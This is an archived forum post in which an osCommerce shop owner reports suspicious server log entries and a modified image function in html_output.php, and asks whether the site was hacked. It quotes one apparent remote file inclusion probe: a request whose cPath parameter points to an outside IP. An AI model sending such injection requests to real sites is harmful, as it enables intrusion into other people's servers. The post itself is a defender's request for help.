shopgrl Posted June 9, 2010 Posted June 9, 2010 I have been finding this in my server logs: GET /osc/index.php?cPath=http://217.218.225.2:2082/index.html? HTTP/1.1" 200 When you added that to my site's full URL it leads to a TEST page. I found the image on that test page in my images folder on the server. My site is hosted by TechSquared out of Roanoke, VA. I never put that image there, so assume someone else did. That image was put on the server on a certain date, so I checked other pages on the server for that date and found that the html_output.php page in the Includes/Functions folder had been altered on the same date. So I compared that page to the original one and they are slightly different. The different code is: if(!file_exists($src) && file_exists('../'.$src)){ copy('../'.$src, $src); } It comes right after this: //// // The HTML image wrapper function function tep_image($src, $alt = '', $width = '', $height = '', $parameters = '') { if ( (empty($src) || ($src == DIR_WS_IMAGES)) && (IMAGE_REQUIRED == 'false') ) { return false; } Can you tell me what that extra code is doing? Is this normal or has someone hacked the page? I have blocked the IP 217.218.225.2 in htaccess. But I am still finding that type of posting all the time in my server logs with a variety of different initiating IPs. My concern is that whoever owns 217.218.225.2 (from Iran) is using my site for some nefarious purpose. Thank you. :huh:
Recommended Posts
Archived
This topic is now archived and is closed to further replies.